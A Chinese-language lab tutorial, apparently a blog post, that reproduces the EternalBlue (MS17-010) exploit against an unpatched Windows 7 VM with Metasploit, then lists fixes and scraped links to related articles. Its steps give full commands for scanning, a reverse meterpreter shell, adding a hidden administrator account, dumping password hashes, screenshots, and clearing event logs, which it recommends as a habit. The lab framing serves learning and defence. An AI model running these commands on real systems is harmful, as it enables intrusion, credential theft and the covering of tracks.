目录

一、漏洞简介

1、永恒之蓝:

2、漏洞原理:

3、影响版本:

二、复现环境

三、漏洞复现

1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态

2、启动kali自带的msf,显示msf6>后说明已经进入msf了

3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块

4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同

5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会

6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)

7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)

8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等

9、对靶机进行一系列操作

四、永恒之蓝漏洞解决办法

一、漏洞简介

1、永恒之蓝:

永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。

2、漏洞原理:

永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

补充:

“445端口是TCP共享服务 445端口它将尝试同时连接到端口139和445。如果端口445有响应,它将向端口139发送TCPRST数据包,以断开并继续与端口455的通信;当端口445没有响应时,使用端口139。”

“139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘可能是最常见的问题。139属于TCP协议。”

3、影响版本:

目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、复现环境

攻击机:kali-Linux-2022.2(IP:192.168.50.133/24)

靶机:Windows 7(IP:192.168.50.159/24)

kali-Linux-2022.2镜像下载地址:https://www.kali.org/get-kali/#kali-bare-metal

Windows 7镜像下载地址:https://msdn.itellyou.cn/

kali-Linux-2022.2和Windows 7能够相互ping通,Windows 7靶机关闭防火墙,开启445端口(默认端口开启),Windows 7靶机不要打补丁

三、漏洞复现

1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态

nmap 192.168.50.159

2、启动kali自带的msf,显示msf6>后说明已经进入msf了

msfconsole

3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块

search ms17-010

4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同

use 3

5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会

show options

我这里只需配置RHOSTS(靶机IP地址)就行了,其他默认

set rhosts 192.168.50.159

配置有效载荷,该步的作用是攻击机扫描完后,使靶机反弹回一个会话给攻击机建立连接

set payload windows/x64/meterpreter/reverse_tcp

6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)

exploit

7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)

use 0

重复第5步步骤,注意:执行show options命令后查看到yes对应的地方如果是空的需要全部配上

8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等

run

9、对靶机进行一系列操作

查看系统信息

sysinfo

反弹shell

shell

可以创建用户

net user xxxx 1234 /add(xxxx用户名 1234密码)

net localgroup administrators xxxx /add (将用户设置为管理员权限)

net user

得到账户hash,解码可以得到密码

hashdump

找到显示的路径可以看到受害者屏幕截图

screenshot

显示成功

记得保持清除日志的好习惯

clearev

四、永恒之蓝漏洞解决办法

1、开启防火墙

2、对系统进行升级或者打补丁

3、关闭相应的端口

Windows下的MS17-010(永恒之蓝)漏洞分析与复现相关推荐

  1. 永恒之蓝漏洞分析与防护技术

    前言 自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,结果菜鸡的我一顿操作都没找回来,就不想写博客了(后来大佬说使用windbg附加,找到那块内存,dump出来就可以还原了,自己还是太年轻呀) ...

  2. 永恒之蓝漏洞分析与防范

    漏洞利用原理 永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行.在Windows操作系统中,SMB服务默认是开启的,监听端口默认为4 ...

  3. 可刑又可拷!永恒之蓝漏洞原理及复现

    一.永恒之蓝介绍 1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2 ...

  4. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  5. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  6. 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币

    WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...

  7. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  8. MS17-010永恒之蓝漏洞的简谈与利用

    MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...

  9. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

最新文章

  1. nginx 负载 sessionid 不一致_你不知道的Nginx负载均衡算法,快进来迅速掌握
  2. 清华学霸一天面试6家大厂-offer拿来吧你
  3. redis setnx 原子性_Redis从入门到深入-分布式锁(26)
  4. 趣谈网络协议笔记-二(第十七讲)
  5. svn 合并分支 等
  6. LSMW批处理使用方法(10)_步骤12、13
  7. Python基础教程:set集合的教程
  8. 失战于知识付费,会员与智能硬件将助蜻蜓FM打赢下半场战争?
  9. IBM、甲骨文、CNCF 就谷歌对 Istio 治理的处理提出抗议
  10. 第三十一期:世界上有四类人永远不可能成为编程界牛人(个人见解,欢迎补充)
  11. java查询SQLServer遇到问题:对象名无效。
  12. Linux学习一周初体验
  13. python工作技巧_4个基本的 Python 技巧让你的工作流程自动化
  14. Android音频框架笔记 - 下篇
  15. C语言 运算符与表达式
  16. 【内网穿透笔记】FTP映射出现227 Entering Passive Mode错误命令原因及解决方法
  17. IDEA 快捷键拆解系列(五):Navigate 篇
  18. 语音端点检测 php,几种语音端点检测方法简介
  19. 海量CAD图纸哪里获取呢?
  20. 定制嵌入式主板需要考虑的功能

热门文章

  1. char str[10]; str=string;
  2. 一周年感谢信 | 黑萤科技赖志宇:志同者将道合一处
  3. vue微信浏览器安卓正常 ios config 报错 “errMsg“:“config:invalid问题
  4. 计算机本科核心课程教学视频,绝对经典,有空温习温习~
  5. 四阶龙格库塔法c语言程序,四阶龙格_库塔算法的C语言实现_毋玉芝
  6. 基于51单片机和OLED屏幕的贪吃蛇游戏
  7. 2009年A股各板块龙头股大全(转载)
  8. 时隔多年,我胡汉三又回来了(大学毕业篇-迷茫)
  9. 用遗传算法,开启研究车间调度问题之门
  10. 【车间调度】FJSP评价指标